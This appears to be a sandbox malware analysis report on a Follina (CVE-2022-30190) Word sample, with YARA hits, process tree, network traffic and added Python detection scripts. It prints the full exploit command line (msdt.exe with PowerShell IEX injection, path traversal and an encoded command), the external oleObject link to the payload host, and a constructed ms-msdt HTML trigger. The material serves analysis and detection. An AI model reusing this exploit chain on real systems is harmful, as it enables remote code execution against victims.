
Windows Analysis Report
20220531_180800.rtf

Overview

General Information

Sample Name: 20220531_180800.rtf
Analysis ID: 639039
MD5: 7b9c8e08371550238fbcd7cee1c8087d
SHA1: ff8c9deb358b2d22aa086cf36406461e8e9978b2
SHA256: b93326f795459d836c277730058e9923ab5f9bfbcef32e1c951e4a0d7538f9f5

Detection

Follina CVE-2022-30190
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Malicious sample detected (through community Yara rule)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Detected suspicious Microsoft Office reference URL
Obfuscated document found, RTF is a DOCX
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 6340 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 6532 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 7100 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
document.xml.rels | SUSP_Doc_WordXMLRels_May22 | Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard, Wojciech Cieślak
  • 0x39:$a1: <Relationships
  • 0x3b9:$a2: TargetMode="External"
  • 0x3b1:$x1: .html!
document.xml.rels | INDICATOR_OLE_RemoteTemplate | Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents | ditekSHen
  • 0x375:$olerel: relationships/oleObject
  • 0x38e:$target1: Target="http
  • 0x3b9:$mode: TargetMode="External
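The two rules above key on the same three traits of word/_rels/document.xml.rels: an oleObject relationship, an http(s) Target, and TargetMode="External" (with the trailing "!" on the .html target as the Follina-specific tell). The signature "Obfuscated document found, RTF is a DOCX" adds a fourth: the sample carries an .rtf extension but is a ZIP container, which Word opens by sniffing content, not extension. The script below is an added triage example, not part of the Joe Sandbox report or of the quoted YARA rules. It builds a minimal in-memory OOXML container (the relationship Ids, the styles part and the helper names container_type, extension_mismatch, scan_rels, scan_docx and build_sample_docx are all my own; the Target URL is the one the report extracted from the sample) and reproduces the rule logic over it.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Constructed document.xml.rels modelled on the YARA string hits above ($olerel, $target1,
# $mode, $x1): one ordinary internal part plus an oleObject relationship whose Target is an
# external HTML page ending in "!". Relationship Ids are made up; the URL is from the report.
SAMPLE_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    f'<Relationships xmlns="{RELS_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
    'relationships/styles" Target="styles.xml"/>'
    f'<Relationship Id="rId1337" Type="{OLE_REL}" '
    'Target="https://cyberleague.co/th1s.html!" TargetMode="External"/>'
    "</Relationships>"
).encode()


def container_type(data: bytes) -> str:
    """Classify a document by its magic bytes rather than by its extension."""
    if data.startswith(b"PK\x03\x04"):
        return "ooxml"          # ZIP container: .docx/.xlsx/.pptx
    if data.startswith(b"{\\rtf"):
        return "rtf"
    if data.startswith(b"\xd0\xcf\x11\xe0"):
        return "ole"            # legacy compound file: .doc/.xls
    return "unknown"


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the name claims RTF but the bytes are an OOXML ZIP ("RTF is a DOCX")."""
    return filename.lower().endswith(".rtf") and container_type(data) == "ooxml"


def scan_rels(rels_xml: bytes) -> list[dict]:
    """Return every external relationship, flagging the traits the two rules key on."""
    findings = []
    root = ET.fromstring(rels_xml)
    for rel in root.iter():
        if not rel.tag.endswith("Relationship") or rel.get("TargetMode") != "External":
            continue
        target = rel.get("Target", "")
        rel_type = rel.get("Type", "")
        findings.append({
            "id": rel.get("Id"),
            "type": rel_type.rsplit("/", 1)[-1],
            "target": target,
            "ole": rel_type == OLE_REL,                                     # $olerel
            "http": target.lower().startswith(("http://", "https://")),    # $target1
            "html_bang": re.search(r"\.html?!$", target, re.I) is not None,  # $x1
        })
    return findings


def scan_docx(data: bytes) -> list[dict]:
    """Walk every .rels part in an OOXML container and collect external relationships."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.endswith(".rels"):
                for f in scan_rels(z.read(name)):
                    f["part"] = name
                    findings.append(f)
    return findings


def build_sample_docx() -> bytes:
    """Minimal in-memory OOXML container carrying SAMPLE_RELS (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx()
    print("container:", container_type(sample),
          "| rtf-extension mismatch:", extension_mismatch("20220531_180800.rtf", sample))
    for finding in scan_docx(sample):
        print(finding)
```

Legitimate documents do carry external relationships (linked images, remote templates), so treat an external oleObject as a triage hit rather than a verdict; the combination of oleObject + http + a target ending in ".html!" is what narrows it to this exploit chain.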
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard
  • 0x113c:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard
  • 0x113c:$re1: location.href = "ms-msdt:
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm | JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm | MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard
  • 0x113c:$re1: location.href = "ms-msdt:

Source | Rule | Description | Author | Strings
00000009.00000002.553703750.0000000003140000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard
  • 0x1c84:$sa1: msdt.exe
  • 0x1cc0:$sa1: msdt.exe
  • 0x2188:$sa1: msdt.exe
  • 0x38b5:$sa1: msdt.exe
  • 0x1d98:$sb2: IT_BrowseForFile=
  • 0x3921:$sb2: IT_BrowseForFile=
00000009.00000002.554020054.00000000033A0000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard
  • 0x2890:$sa1: msdt.exe
  • 0x2964:$sb2: IT_BrowseForFile=
00000009.00000002.553580729.0000000000A90000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard
  • 0x22d0:$sa1: msdt.exe
  • 0x230c:$sa1: msdt.exe
  • 0x27d4:$sa1: msdt.exe
  • 0x23e4:$sb2: IT_BrowseForFile=
00000009.00000002.553717920.0000000003148000.00000004.00000020.00020000.00000000.sdmp | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard
  • 0x2618:$sa1: msdt.exe
  • 0x60a8:$sa1: msdt.exe
  • 0x18c06:$sa1: msdt.exe
  • 0x16c28:$sb2: IT_BrowseForFile=
Process Memory Space: msdt.exe PID: 7100 | SUSP_PS1_Msdt_Execution_May22 | Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 | Nasreddine Bencherchali, Christian Burkard
  • 0xccd:$sa1: msdt.exe
  • 0x32ec:$sa1: msdt.exe
  • 0x488e:$sa1: msdt.exe
  • 0x8d4c:$sa1: msdt.exe
  • 0xbd02:$sa1: msdt.exe
  • 0x12fd5:$sa1: msdt.exe
  • 0x12ff2:$sa1: msdt.exe
  • 0x13255:$sa1: msdt.exe
  • 0x139b6:$sa1: msdt.exe
  • 0x14d9a:$sa1: msdt.exe
  • 0x14db7:$sa1: msdt.exe
  • 0x14ddb:$sa1: msdt.exe
  • 0x14dfb:$sa1: msdt.exe
  • 0x14e70:$sa1: msdt.exe
  • 0x1c10e:$sa1: msdt.exe
  • 0x1f0c4:$sa1: msdt.exe
  • 0x22589:$sa1: msdt.exe
  • 0x24ae4:$sa1: msdt.exe
  • 0x27a9a:$sa1: msdt.exe
  • 0x2af61:$sa1: msdt.exe
  • 0x2f9c8:$sa1: msdt.exe

No Sigma rule has matched
No Snort rule has matched
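The msdt.exe command line in the process tree and the `location.href = "ms-msdt:` hits in the dropped .htm files are two views of the same artefact: an ms-msdt: URI whose IT_BrowseForFile parameter carries a PowerShell $( ... ) sub-expression, a ../ traversal that makes the "file" resolve to mpsigstub.exe, and a base64 -EncodedCommand payload. The script below is an added triage example, not part of the Joe Sandbox report or of the quoted YARA rules. SAMPLE_CMDLINE is copied verbatim from the PID 7100 entry above; SAMPLE_HTML is a constructed stand-in for the dropped page (the report shows only the matched string, so its IEX('calc') payload is made up); the function names and the looks_like_follina heuristic are my own, not the published SUSP_PS1_Msdt_Execution_May22 rule.

```python
import base64
import re
from typing import Optional

# Command line copied verbatim from the msdt.exe entry (PID 7100) in the process tree above.
SAMPLE_CMDLINE = r'''C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe'''

# Constructed stand-in for the dropped th1s[1].htm. The report only shows the YARA hit
# `location.href = "ms-msdt:`; everything else here, including the IEX('calc') payload, is made up.
SAMPLE_HTML = r'''<html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_BrowseForFile=$(IEX('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"";
</script></body></html>'''


def looks_like_follina(text: str) -> bool:
    """Heuristic in the spirit of the $sa1 (msdt.exe) / $sb2 (IT_BrowseForFile=) hits above,
    tightened with the traits that make the parameter dangerous. Not the published rule."""
    low = text.lower()
    msdt = "msdt.exe" in low or "ms-msdt:" in low
    return msdt and "IT_BrowseForFile=" in text and ("$(" in text or "/../" in text)


def uri_from_cmdline(cmdline: str) -> Optional[str]:
    """The URI is everything from ms-msdt: to the end of the command line."""
    m = re.search(r"ms-msdt:.*", cmdline)
    return m.group(0) if m else None


def uri_from_html(html: str) -> Optional[str]:
    """Pull the ms-msdt: URI out of a location.href assignment, undoing JS backslash escapes."""
    m = re.search(r'location\.href\s*=\s*"((?:\\.|[^"\\])*)"', html)
    if not m:
        return None
    uri = re.sub(r"\\(.)", r"\1", m.group(1))
    return uri if uri.startswith("ms-msdt:") else None


def decode_encoded_command(text: str) -> Optional[str]:
    """powershell -EncodedCommand carries base64 over UTF-16LE, not UTF-8."""
    m = re.search(r"-EncodedCommand\s+([A-Za-z0-9+/=]+)", text, re.I)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def parse_msdt_uri(uri: str) -> dict:
    """Split an ms-msdt: URI into troubleshooter id, /param key-value pairs and the parts of
    IT_BrowseForFile that matter: the $( ... ) sub-expression, the ../ traversal and its
    target, and any embedded -EncodedCommand payload, decoded."""
    info = {"id": None, "skip": None, "params": {}, "injection": None,
            "traversal": None, "encoded_command": None}
    m = re.search(r"/id\s+(\S+)", uri)
    info["id"] = m.group(1) if m else None
    m = re.search(r"/skip\s+(\S+)", uri)
    info["skip"] = m.group(1) if m else None
    m = re.search(r'/param\s+"?(.*)$', uri, re.S)
    if m:
        # values may contain spaces; only split where the next IT_<name>= key begins
        for part in re.split(r"\s+(?=IT_\w+=)", m.group(1).rstrip('"')):
            key, _, value = part.partition("=")
            info["params"][key] = value
    browse = info["params"].get("IT_BrowseForFile", "")
    m = re.search(r"\$\((.*)\)", browse, re.S)      # greedy: the whole $( ... ) expression
    if m:
        info["injection"] = m.group(1)
    m = re.search(r"((?:\.\./)+)(.*)$", browse)
    if m:
        info["traversal"] = {"depth": m.group(1).count("../"), "target": m.group(2)}
    info["encoded_command"] = decode_encoded_command(browse)
    return info


if __name__ == "__main__":
    for label, uri in (("process cmdline", uri_from_cmdline(SAMPLE_CMDLINE)),
                       ("dropped html", uri_from_html(SAMPLE_HTML))):
        print(f"[{label}] suspicious={looks_like_follina(uri)}")
        for key, value in parse_msdt_uri(uri).items():
            print(f"  {key}: {value}")
```

Run against the report's command line this decodes the payload to a System.Windows.Forms message box, which is why the sandbox saw no follow-on process: the sample is a proof of concept, and the same parser applied to a live case would surface the real stager in encoded_command or injection. Note the UTF-16LE decode; a UTF-8 decode of -EncodedCommand yields NUL-interleaved garbage.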


        Exploits

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8EA7015A.htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\th1s[1].htm, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F640E46C.htm, type: DROPPED
Source: document.xml.rels | Extracted files from sample: https://cyberleague.co/th1s.html!
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.250.15.191:443 -> 192.168.2.3:49747 version: TLS 1.2

        Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic | TCP traffic: 192.168.2.3:49741 -> 13.250.15.191:443
Source: global traffic | DNS query: name: cyberleague.co
Source: global traffic | HTTP traffic detected:
  GET /th1s.html HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
  Accept-Encoding: gzip, deflate
  Host: cyberleague.co
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /th1s.html HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
  Accept-Encoding: gzip, deflate
  Host: cyberleague.co
  If-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMT
  If-None-Match: "13e4-5e063d0e1ca1e"
  Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
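The two GET requests above are the loader stage as seen on the wire: WINWORD.EXE itself (User-Agent ending in "ms-office; MSOffice 16") fetches the HTML page named in the external oleObject relationship, and the second request is a cache re-validation (If-Modified-Since / If-None-Match) for the same page. The trailing "!" in the relationship target is an OLE moniker separator and never reaches the request line. The script below is an added detection example, not part of the Joe Sandbox report: it rebuilds the two requests from the headers listed above (joined with CRLF as they would appear on the wire), adds two constructed benign controls, and flags Office clients pulling HTML. The helper names parse_request, office_html_fetch and triage are my own.

```python
import re

# User-Agent copied from the two "HTTP traffic detected" lines above.
OFFICE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; "
             ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; "
             "ms-office; MSOffice 16)")

SAMPLE_REQUESTS = [
    # request 1 and 2: rebuilt from the report's header lists
    "GET /th1s.html HTTP/1.1\r\nAccept: */*\r\nUser-Agent: " + OFFICE_UA +
    "\r\nAccept-Encoding: gzip, deflate\r\nHost: cyberleague.co\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /th1s.html HTTP/1.1\r\nAccept: */*\r\nUser-Agent: " + OFFICE_UA +
    "\r\nAccept-Encoding: gzip, deflate\r\nHost: cyberleague.co\r\n"
    "If-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMT\r\nIf-None-Match: \"13e4-5e063d0e1ca1e\"\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    # constructed benign controls (not from the report): Office fetching a config endpoint,
    # and a browser fetching the same HTML page
    "GET /config/v2/Office HTTP/1.1\r\nHost: config.edge.skype.com\r\nUser-Agent: " + OFFICE_UA + "\r\n\r\n",
    "GET /th1s.html HTTP/1.1\r\nHost: cyberleague.co\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0) Chrome/102.0\r\n\r\n",
]


def parse_request(raw: str) -> dict:
    """Minimal HTTP/1.1 request parser: request line plus a case-insensitive header map."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def office_html_fetch(raw: str):
    """Flag an Office client (ms-office / MSOffice in the UA) retrieving an HTML resource,
    which is how an external oleObject relationship reaches the ms-msdt: handler.
    Returns a finding dict, or None when the request does not fit."""
    req = parse_request(raw)
    ua = req["headers"].get("user-agent", "")
    if not re.search(r"ms-office|MSOffice", ua):
        return None
    path = req["target"].split("?", 1)[0]
    if not re.search(r"\.html?$", path, re.I):
        return None
    hdrs = req["headers"]
    return {
        "host": hdrs.get("host"),
        "path": path,
        "revalidation": "if-none-match" in hdrs or "if-modified-since" in hdrs,
    }


def triage(requests):
    """Run the check over a batch of raw requests and keep only the hits."""
    return [f for f in (office_html_fetch(r) for r in requests) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_REQUESTS):
        print(finding)
```

On its own an Office process fetching HTML is a weak signal (linked content and remote templates produce it too); it becomes a strong one when the same host appears in the process tree as WINWORD.EXE spawning msdt.exe, as it does here.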
Source: ~WRS{12FCD2A2-2042-4667-BB36-257049CA1904}.tmp.0.dr | String found in binary or memory: https://cyberleague.co/th1s.html
Source: 4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.dr | Strings found in binary or memory:
  • http://b.c2r.ts.cdn.office.net/pr
  • http://f.c2r.ts.cdn.office.net/pr
  • http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
  • http://weather.service.msn.com/data.aspx
  • https://addinsinstallation.store.office.com/app/acquisitionlogging
  • https://addinsinstallation.store.office.com/app/download
  • https://addinsinstallation.store.office.com/appinstall/authenticated
  • https://addinsinstallation.store.office.com/appinstall/preinstalled
  • https://addinsinstallation.store.office.com/appinstall/unauthenticated
  • https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
  • https://addinslicensing.store.office.com/apps/remove
  • https://addinslicensing.store.office.com/commerce/query
  • https://addinslicensing.store.office.com/entitlement/query
  • https://addinslicensing.store.office.com/orgid/apps/remove
  • https://addinslicensing.store.office.com/orgid/entitlement/query
  • https://analysis.windows.net/powerbi/api
  • https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  • https://api.aadrm.com
  • https://api.aadrm.com/
  • https://api.addins.omex.office.net/appinfo/query
  • https://api.addins.omex.office.net/appstate/query
  • https://api.addins.store.office.com/addinstemplate
  • https://api.addins.store.office.com/app/query
  • https://api.addins.store.officeppe.com/addinstemplate
  • https://api.cortana.ai
  • https://api.diagnostics.office.com
  • https://api.diagnosticssdf.office.com
  • https://api.diagnosticssdf.office.com/v2/feedback
  • https://api.diagnosticssdf.office.com/v2/file
  • https://api.microsoftstream.com/api/
  • https://api.office.net
  • https://api.onedrive.com
  • https://api.powerbi.com/beta/myorg/imports
  • https://api.powerbi.com/v1.0/myorg/datasets
  • https://api.powerbi.com/v1.0/myorg/groups
  • https://apis.live.net/v5.0/
  • https://arc.msn.com/v4/api/selection
  • https://asgsmsproxyapi.azurewebsites.net/
  • https://augloop.office.com
  • https://augloop.office.com/v2
  • https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
  • https://autodiscover-s.outlook.com/
  • https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
  • https://cdn.entity.
  • https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
  • https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
  • https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
  • https://client-office365-tas.msedge.net/ab
  • https://clients.config.office.net/
  • https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
  • https://clients.config.office.net/user/v1.0/android/policies
  • https://clients.config.office.net/user/v1.0/ios
  • https://clients.config.office.net/user/v1.0/mac
  • https://clients.config.office.net/user/v1.0/tenantassociationkey
  • https://cloudfiles.onenote.com/upload.aspx
  • https://config.edge.skype.com
  • https://config.edge.skype.com/config/v1/Office
  • https://config.edge.skype.com/config/v2/Office
  • https://cortana.ai
  • https://cortana.ai/api
  • https://cr.office.com
  • https://dataservice.o365filtering.com
  • https://dataservice.o365filtering.com/
  • https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
  • https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
  • https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
  • https://dev.cortana.ai
  • https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
  • https://dev0-api.acompli.net/autodetect
  • https://devnull.onenote.com
  • https://directory.services.
  • https://ecs.office.com/config/v2/Office
  • https://edu-mathreco-prod.trafficmanager.net
  • https://edu-mathsolver-prod.trafficmanager.net
  • https://enrichment.osi.office.net/
  • https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
  • https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
  • https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
  • https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
  • https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
  • https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
  • https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
  • https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
  • https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
  • https://entitlement.diagnostics.office.com
  • https://entitlement.diagnosticssdf.office.com
  • https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  • https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
  • https://globaldisco.crm.dynamics.com
  • https://graph.ppe.windows.net
  • https://graph.ppe.windows.net/
  • https://graph.windows.net
  • https://graph.windows.net/
  • https://hubblecontent.osi.office.net/contentsvc/api/telemetry
  • https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
  • https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
  • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
  • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
  • https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
  • https://hubblecontent.osi.office.net/contentsvc/microsofticon?
  • https://incidents.diagnostics.office.com
  • https://incidents.diagnosticssdf.office.com
  • https://inclient.store.office.com/gyro/client
  • https://inclient.store.office.com/gyro/clientstore
  • https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
  • https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
  • https://insertmedia.bing.office.net/odc/insertmedia
  • https://invites.office.com/
  • https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
  • https://lifecycle.office.com
  • https://login.microsoftonline.com/
  • https://login.windows-ppe.net/common/oauth2/authorize
  • https://login.windows.local
  • https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
  • https://login.windows.net/common/oauth2/authorize
  • https://loki.delve.office.com/api/v1/configuration/officewin32/
  • https://lookup.onenote.com/lookup/geolocation/v1
  • https://management.azure.com
  • https://management.azure.com/
  • https://messaging.engagement.office.com/
  • https://messaging.engagement.office.com/campaignmetadataaggregator
  • https://messaging.office.com/
